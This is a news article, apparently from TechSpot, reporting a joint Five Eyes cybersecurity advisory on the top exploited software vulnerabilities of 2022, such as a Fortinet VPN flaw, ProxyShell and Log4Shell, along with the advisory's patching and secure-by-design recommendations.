In context: The Five Eyes (FVEY) alliance is a collaboration among the intelligence agencies of Australia, Canada, New Zealand, the United Kingdom, and the United States. In the past, the alliance was mostly known for its Echelon surveillance system. Today, it mostly deals in cybersecurity and software vulnerabilities.
We live in a software-filled world, and that software is riddled with dangerous security vulnerabilities ready to be exploited by cybercriminals or state-sponsored hackers. A newly released advisory coauthored by the Cybersecurity and Infrastructure Security Agency (CISA), NSA, and the FBI, together with cybersecurity agencies from the Five Eyes countries, reveals the top exploited vulnerabilities for 2022.
The advisory includes a list of the Common Vulnerabilities and Exposures (CVE) which have been routinely and frequently exploited by criminals and hackers. According to the world's top cyber-security alliance, in 2022 malicious cyber actors chose to abuse older, well-known software vulnerabilities more frequently than recently disclosed bugs. They preferred to target unpatched, internet-facing systems.
The top spot on the list of the most exploited flaws in 2022 include CVE-2018-13379, a vulnerability found in Fortinet SSL VPN products that was already routinely exploited in 2020 and 2021. The bug could allow an unauthenticated attacker to download system files via specially crafted HTTP requests. The continued exploitation of this flaw indicates that many organizations failed to patch software in a timely manner, the advisory says.
The top exploited flaws in 2022 also include three CVE vulnerabilities affecting Microsoft Exchange that are commonly known as ProxyShell (CVE-2021-34473, CVE-2021-31207, CVE-2021-34523), remote code execution (RCE) issues, Log4Shell, and more. The advisory confirms that Microsoft is the most targeted company for software flaws. In addition to the top 12 exploited vulnerabilities, the Five Eyes advisory also includes a list of 30 CVE flaws which are often abused to compromise organizations and state agencies.
Rather than being just a list of exploited vulnerabilities, the joint advisory also provides some advice and "strong" encouragement about good security practices for vendors, designers, developers, and end-user organizations. Software companies should implement a "secure-by-design" approach to development to reduce the prevalence of vulnerabilities, the advisory says.
End-user customers are advised to apply newly released patches to their systems. Furthermore, companies and organizations should use security tools like antivirus and antimalware services, web application firewalls, and network protocol analyzers. The advisory also says they should ask their software providers to discuss how they plan to improve security in their products.
https://www.techspot.com/news/99667-five-eyes-intelligence-agencies-discloses-12-top-exploited.html
